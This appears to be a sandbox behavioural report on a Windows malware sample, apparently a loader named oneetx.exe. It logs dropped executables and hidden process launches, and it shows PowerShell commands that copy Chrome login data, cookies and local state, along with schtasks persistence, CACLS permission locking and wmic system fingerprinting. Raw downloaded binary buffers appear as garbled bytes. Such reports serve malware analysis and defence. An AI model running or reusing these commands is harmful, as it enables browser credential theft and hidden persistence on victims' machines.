file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2391.0\manifest.fingerprint
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0\preloaded_data.pb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\is
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\a4b90990b418581487bb13a2cc67700a3c359804f91bdfb8e377cd0ec80ddc10.sth
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\is\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\iw
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\it
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\de
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\id
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\c652a0ec48ceb3fcab170992c43a87413309e80065a26252401ba3362a17c565.sth
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fi\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\0.57.44.2492\_platform_specific\x86_64\pnacl_public_pnacl_json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2209.0\_platform_specific
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\es_419\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\5ea773f9df56c0e7b536487dd049e0327a919a0c84a112128418759681714558.sth
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\el\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\ja
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\fil
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\ro\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ca
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\el\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\tr\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\cs
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT\messages.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\computed_hashes.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\7\manifest.fingerprint
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2209.0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_metadata\computed_hashes.json

Creates executable files on the filesystem (20 events)

file	C:\Users\test22\AppData\Roaming\exodus-windows-x64-23.3.27.exe
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\zap9306.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\zap6859.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\xnmXr68.exe
file	C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\v7412DB.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\w78XP44.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\tz9648.exe
file	C:\Users\test22\AppData\Local\Temp\1000012001\w.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\zap5462.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe
file	C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe
file	C:\Users\test22\AppData\Roaming\electrum-4.3.4-setup.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y53BD64.exe
file	C:\Users\test22\AppData\Local\Temp\Updater.exe
file	C:\Users\test22\AppData\Roaming\bitcoin-22.0-win64-setup.exe

Creates a shortcut to an executable file (50 out of 84 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_Click.pyw.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click_image.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msi2.png.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\My Documents.LNK
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test_doc.eml.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\office_2007.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exe1.zip.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test.eml.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot.png.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\╗τ┐δ╣².txt.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.py.lnk
file	C:\Users\test22\AppData\Local\Temp\c5d2db5804\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok2.png.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox Guest Additions\Website.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok1.png.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\sn.txt.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test (1).eml.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMSAuto_Net_2015_v1.4. 2.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\docx2.png.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Database1.accdb.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\한글2010(정품).lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMS Activation.txt.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Outlook.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.py.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\SendTo\EditPlus.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\readme.txt.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\시리얼넘버.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroCERT.bmp.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk

Creates a suspicious process (23 events)

cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Microsoft\Windows\History\" \"C:\Users\test22\AppData\Local\Temp\TCoaNatyyi\""
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\test22\AppData\Local\Temp\SjFbcXoEFf\""
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\RsWxPLDnJObCsNV\""
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\leQYhYzRyWJjPjz\""
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies\" \"C:\Users\test22\AppData\Local\Temp\MRAjWwhTHc\""
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\tcuAxhxKQFDaFpL\""
cmdline	cmd.exe /c "wmic csproduct get uuid"
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\test22\AppData\Local\Temp\lgTeMaPEZQ\""
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\test22\AppData\Local\Temp\pfRFEgmota\""
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\FetHsbZRjxAwnwe\""
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
cmdline	wmic path win32_VideoController get name
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\EkXBAkjQZLCtTMt\""
cmdline	wmic os get Caption
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	wmic csproduct get uuid
cmdline	cmd /C "wmic path win32_VideoController get name"
cmdline	wmic cpu get name
cmdline	cmd /C "wmic cpu get name"
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\test22\AppData\Local\Temp\XVlBzgbaiC\""
cmdline	powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\krBEmfdzdc\""

Drops a binary and executes it (7 events)

file	C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe
file	C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe
file	C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe
file	C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe
file	C:\Users\test22\AppData\Local\Temp\1000012001\w.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe

Drops an executable to the user AppData folder (8 events)

file	C:\Users\test22\AppData\Local\Temp\1000012001\w.exe
file	C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe
file	C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe
file	C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe
file	C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe
file	C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000012001\w.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000012001\w.exe	1	1
ShellExecuteExW March 30, 2023, 4:28 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe	1	1
ShellExecuteExW March 30, 2023, 4:29 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main filepath: rundll32.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 30, 2023, 4:28 p.m.	process_identifier: 1684 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 24576 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x00460000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process oneetx.exe (7 events)

Time & API	Arguments	Status	Return
InternetReadFile March 30, 2023, 4:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL9¬à0¤zµ à@ @(µOà$µ H.textÐ ¤ `.rsrc$à¨@@.reloc¸@B\µHô»ùE0 us# ~ç%-&~æþ¾s$ %ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢( o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/ ,rãprp~( () +;rprap~( () o/ -{å(+{å( (0 þ 9~o1 (2 o3 o4 (5 {å((0 þ 95þ¶s6 ~è%-&~æþ¿s7 %è(+þ·s6 ~é%-&~æþÀs7 %é(+þ¸s6 ~ê%-&~æþÁs7 %ê(+oÙoÛþ¹s8 ~ë%-&~æþÂs9 %ë(+oÝoãþºs: ~ì%-&~æþÃs; %ì(+oßþ»s< ~í%-&~æþÄs= %í(+oá(+,[så%oÙ%rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ%r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ,oB (C :üÿÿÞþo Üo :áûÿÿÞ,o ÜÞ&Þ+Adå( µ=4&Zah0s? h%ÐÏ(D sE (F (G þ , ÝS(s¦h%Ð£(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+rpoo(I - o+rpoo(I - o+rpoÜorp(J ,oK Xo¥þ :úþÿÿÞÞÞÞ+AdzJÄzRÌoC8{}0ÇsL (F (G þ , Ý(s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!¶Yoñ%o«oH oó%o«(oõoðjþ,-(N (O (P !µ÷õYoñÞ&Þ-+(ô(I þ , oQ Xo¥þ:®þÿÿÞ&ÞÞÞ+AL` i-±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA(s¦h%Ð(D sE o©&8àh%Ð¬(D sE o§oH h%Ð§(D sE oR -h%ÐÒ(D sE oR + ,(s× h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ, oS Xo¥þ:ÿÿÿÞ ÞÞÞ+ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý(s¦r¡prp~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû request_handle: 0x00cc000c	1	1
InternetReadFile March 30, 2023, 4:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÀ ªñà0>Æ~] `@ `@0]K` Ã@ H.text= > `.rsrc Ã`Ä@@@.reloc@@B`]HäSì/ÐT fJ(; {8~ (8}8äÿÿÿ{ 0w8OþE8} 8Irps z~ ( ~~:Àÿÿÿ& 8µÿÿÿ?Éÿÿÿ8=¼ÿÿÿ8«ÿÿÿ8½ÿÿÿ8ÿÿÿ{ {ÚÐ#~´(#~µ(98}8óÿÿÿJ8} 8óÿÿÿ®~¶(¢98~ ~Ê(¦80 þ8þE¢?Ïö@])"¬Tß8~Ô(ª~×(ª"@ZY"@Z"@Z( ~=:rÿÿÿ& 8gÿÿÿ~Ù(²8v""´B~Ø(®8#~Ö(ª~×(ªY( 8l~Ô(ª~Õ(ª( 8×8Ò 8Üþÿÿ~Ö(ª~Õ(ª( þ8«þÿÿ9,8íþÿÿ8Â8"C"´B~Ø(®8i~Ô(ª~×(ª( 88 ~y:Dþÿÿ& 89þÿÿ8Ê8"4C"´B~Ø(®8~Ö(ªY~×(ª( 8`~Ô(ª~×(ªY( 8nÿÿÿ8F ~u9²ýÿÿ& 8§ýÿÿ~Ù(²8("´B"´B~Ø(® 8pýÿÿ~Ö(ª~Õ(ª( 8$~Ö(ª~×(ª( 8Û~Ù(²8î~Ö(ª~Õ(ªX( 8'ÿÿÿ~Ô(ªX~×(ª( 8¿~Ö(ªY~Õ(ª( ~:üÿÿ& 8üÿÿ8:86ÿÿÿ~Ô(ª~×(ª( 8$s 8Müÿÿ9Äÿÿÿ8Tÿÿÿ98/9!ýÿÿ8i~Ô(ª~Õ(ª( 8`þÿÿ~Ô(ª~Õ(ªX( 8Üûÿÿ9þÿÿ ~:Æûÿÿ& 8»ûÿÿ~Ö(ª"@ZY~×(ª"@ZY"@Z"@Z( 8'üÿÿ~Ô(ªX~Õ(ª( 8hüÿÿ~Ö(ª"@ZY~Õ(ª"@Z"@Z( 8ûÿÿ9ýÿÿ8Aþÿÿ8Tüÿÿ8\|þÿÿ~Ö(ª~×(ª( ~c9Ðúÿÿ& 8Åúÿÿ~Ô(ª~Õ(ª"@Z"@Z( ~S9úÿÿ& 8{úÿÿ9vÿÿÿ 8júÿÿ~¡( ~N9Oúÿÿ& 8Dúÿÿ8cûÿÿ8çþÿÿ~Ù(²8vûÿÿ:Ëþÿÿ8Õÿÿÿ8ïÿÿÿ8üÿÿ0Z8IþE8~Ú(¶8~ ( ~99Æÿÿÿ& 8»ÿÿÿ}8Ïÿÿÿ0x þ8þE&8!} ~-:Øÿÿÿ& 8Íÿÿÿ~ (8~·(¢&8~Û(¶8îÿÿÿ0V8EþE782}8~Ü(¶ ~`:Ëÿÿÿ& 8Àÿÿÿ}8Áÿÿÿ0f8þEC8>}8%~ ( ~X9Ìÿÿÿ& 8Áÿÿÿ}8Ïÿÿÿ~Ë(¦8îÿÿÿ~ (8~Ì(¦8~Í(¦8{~¢(80Å8©þEX8~á(º>B8~à(º~á(ºs } ~9¦ÿÿÿ& 8ÿÿÿ~ (88ëÿÿÿ ~o9wÿÿÿ& 8lÿÿÿ~Î(¦8~à(º=\ÿÿÿ8ºÿÿÿ0°(; 8ryp~ó(¾}8} 8(! ~(:& 8 8ªÿÿÿþE!ÄÛÚ8 /s" ~ (Ö8\{þs# ~(â 8¤ÿÿÿ~õ(Æ~û(Ê8 /s" ~(Ö8ÿÿÿs$ %~(Ú%~(Ú}8kryp~ó(¾~ü(Ê8ÿÿÿ (~ô(Â8mÿÿÿrp" As% ~(Ò8«ÿÿÿ~(Î 8Ûþÿÿs& %~(Þ} ~G9µþÿÿ& 8ªþÿÿ08iþE48/~( ~(ê8~( ((&8Ñÿÿÿ~ (î ~i:¦ÿÿÿ& 8ÿÿÿ~(æ @Èÿÿÿ8§ÿÿÿ0$ þ8þEé¾H8ä8.8{Y}8^{ <8r~ (8 {9@ ~c9ÿÿÿ& 8~ÿÿÿ{Y}8·ÿÿÿ{?ªÿÿÿ8Úÿÿÿ{?áÿÿÿ 8Aÿÿÿ{X}8Gÿÿÿ{ ò<Uÿÿÿ ~:ÿÿÿ& 8ÿÿÿ{ request_handle: 0x00cc000c	1	1
InternetReadFile March 30, 2023, 4:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELf dàØ=Îö= >@ @><V]`ö=K>`â=`: > H.textÔÖ= Ø= `.rsrc`>Ú=@@.reloc >à=@B°ö=H³Þ b#0Ï þ8þEu<a8þ ( ( ? ~/ {a :ºÿÿÿ& 8¯ÿÿÿ ~/ {g 9ÿÿÿ& 8ÿÿÿ~:< 8vÿÿÿ( ç s (þ8iÿÿÿrps z(( >þ þ ( &~þ~0© þ8þE]98 (ô,8s( ~/ {g :½ÿÿÿ& 8²ÿÿÿ( ~/ { 9ÿÿÿ& 8ÿÿÿ( ~/ {f :tÿÿÿ& 8iÿÿÿ( &~þ~0¡(8( ~/ {N :& 8 8ÌÿÿÿþEE+8@( ~/ {: 9Ëÿÿÿ& 8Àÿÿÿ(((ª& 8¦ÿÿÿ( 8ÿÿÿ0Ã þ8þEK;p+[8F( ~/ {= 9Ãÿÿÿ& 8¸ÿÿÿ: 8¨ÿÿÿ8Äÿÿÿ 8ÿÿÿ{:8áÿÿÿ{( 8sÿÿÿ8ÿÿÿ ~/ {a :Zÿÿÿ& 8Oÿÿÿ0ü þ8þENh/y£¢8Irêp( ~/ {@ :»ÿÿÿ& 8°ÿÿÿ"À@"PAs ( 8ÿÿÿ Æ ßs (8%( 8fÿÿÿ( þ8Nÿÿÿrêp( 8=ÿÿÿ( ~/ {Q 9!ÿÿÿ& 8ÿÿÿ(ô,(&( þ o &~þ~þ o :þ þ ( *þ (! :þ þ (" :þ þ (# :þ þ ($ :þ þ o% :þ þ (& 2%i( 0² þ8þE(8#* ~/ {A :Öÿÿÿ& 8Ëÿÿÿ(# ~/ { 9& 8þE8($o' (( (%8Ýÿÿÿ&8Ýzÿÿÿ8rÿÿÿHZ¢ 0G(ô,8( ~/ { 9& 8 8ÌÿÿÿþE8Nþ þ þ () &~þ~(5(* .þ (ªÐ=(+ (+t?(, (+o. &8V(.(t(/V('tA(0(+06((t5o0 (+8Ý&8Ý8* !0G(ô,8( ~/ {e :& 8 8ÌÿÿÿþE8()&~þ~(1 :þ þ o2 þ o3 0G(68( ~/ {^ 9& 8 8ÌÿÿÿþE808wþEu8pröpÐ(+ o4 s5 ~/ {a 9¼ÿÿÿ& 8±ÿÿÿ8. ~/ {; 9ÿÿÿ& 8ÿÿÿ~9ÿÿÿ8Íÿÿÿ~~ * j(2rDp~ o6 t(ô,&~ þ~ 0¬(X8( 8 8áÿÿÿþE Ìû¢)(R\|»ê8(U 8°ÿÿÿ(I 8ÿÿÿrtp(C ~/ {W :ÿÿÿ& 8uÿÿÿ @B(; ~/ {a :Vÿÿÿ& 8Kÿÿÿ(G 8:ÿÿÿ üO(= 